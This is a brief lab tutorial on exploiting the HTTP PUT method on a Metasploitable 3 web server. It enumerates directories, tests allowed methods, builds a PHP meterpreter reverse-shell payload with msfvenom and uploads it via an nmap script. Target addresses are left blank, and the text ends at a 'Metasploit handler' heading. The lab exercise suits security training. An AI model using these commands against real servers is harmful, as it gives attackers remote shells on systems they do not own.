Web Exploit – HTTP-PUT

In this tutorial, we will be exploiting the HTTP put method for uploading a malicious PHP file for creating a meterpreter reverse shell.

The system we will be Metasploitable 3 and the port is 8585 HTTP server.

Directory Enumeration

First, let’s run a gobuster scan on port 8585 to find any directories that may be vulnerable.

gobuster -u -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt -t 40

HTTP Methods

Now that we have a list of directories lets start with nmap script http-methods to see the HTTP methods for this directory.

nmap -p 8585 -sV –script http-methods,http-trace –script-args http-methods.test-all=true,http-methods.url-path=’/uploads/’

Payload build – MSFVenom

The “uploads” directory is vulnerable to http-put let’s build a PHP payload using MSFVenom.

msfvenom -p php/meterpreter_reverse_tcp lhost= lport=4444 -f raw > phpexploit.php


nmap -script http-put –script-args http-put.url=’/uploads/shell.php’,http-put.file=’/root/phpexploit.php’ -p 8585 -sV

Metasploit handler